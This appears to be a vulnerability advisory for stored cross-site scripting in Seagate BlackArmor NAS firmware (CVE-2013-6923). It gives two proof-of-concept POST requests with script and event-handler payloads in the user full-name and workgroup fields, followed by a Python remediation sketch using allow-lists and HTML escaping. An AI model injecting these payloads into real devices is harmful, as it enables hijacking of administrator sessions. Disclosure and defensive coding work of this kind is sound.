# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site Scripting Vulnerabilities
# Google Dork: N/A
# Date: 04-01-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.seagate.com/
# Software Link: http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
# Version: sg2000-2000.1331
# Tested on: N/A
# CVE: CVE-2013-6923
#
## Description:
#
# When adding a user to the device, it is possible to enter a full name. This input field does not
# sanitize its input, so any payload entered there is stored and executed when the page is reloaded.
#
# The workgroup configuration is also vulnerable to persistent XSS. The Work Group name input
# field does not sanitize its input.
#
# This vulnerability was reported to Seagate in September 2013; they stated that this will not be fixed.
#
## Proof of Concept #1:
#
# POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en
# Parameters:
#
# index = 2
# fullname = <script>alert(1);</script>
# submit = Submit
#
#
## Proof of Concept #2:
#
# POST: http(s)://<url | ip>/admin/network_workgroup_domain.php?lang=en&gi=n003
# Parameter:
#
# workname = "><input onmouseover=prompt(1) >
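The two fields above land in different HTML contexts (element content for fullname, a quoted attribute for workname), so the missing control is allow-list validation on input plus context-appropriate encoding on output. The sketch below is an added example, not Seagate firmware code and not part of the original advisory; the allow-list patterns, the length limits, the function names and the sample benign values are assumptions.

```python
import html
import re

# Assumed allow-lists (not from the advisory): characters a display name or a
# workgroup name legitimately needs. Adjust to the deployment.
FIELD_POLICY = {
    "fullname": re.compile(r"[A-Za-z0-9 .,'_-]{1,64}"),
    "workname": re.compile(r"[A-Za-z0-9._-]{1,15}"),
}


def validate(field: str, value: str) -> bool:
    """Input side: reject values outside the field's allow-list."""
    return FIELD_POLICY[field].fullmatch(value) is not None


def render_fullname_cell(fullname: str) -> str:
    """Output side, element-content context (PoC #1 lands here)."""
    return "<td>" + html.escape(fullname, quote=True) + "</td>"


def render_workname_input(workname: str) -> str:
    """Output side, quoted-attribute context (PoC #2 lands here).

    The attribute is always double-quoted and quote=True encodes '"', so the
    value cannot close the attribute or the tag.
    """
    return '<input type="text" name="workname" value="%s">' % html.escape(workname, quote=True)


# The two values from the advisory, used as test input.
POC_FULLNAME = "<script>alert(1);</script>"
POC_WORKNAME = '"><input onmouseover=prompt(1) >'

if __name__ == "__main__":
    # Benign values below are constructed for illustration.
    for field, value in (("fullname", POC_FULLNAME), ("workname", POC_WORKNAME),
                         ("fullname", "Jane O'Neil"), ("workname", "WORKGROUP")):
        print(field, repr(value), "accepted" if validate(field, value) else "rejected")
    print(render_fullname_cell(POC_FULLNAME))
    print(render_workname_input(POC_WORKNAME))
```

Encoding at output is the control that matters for values already stored on the device; validation alone does not neutralise them.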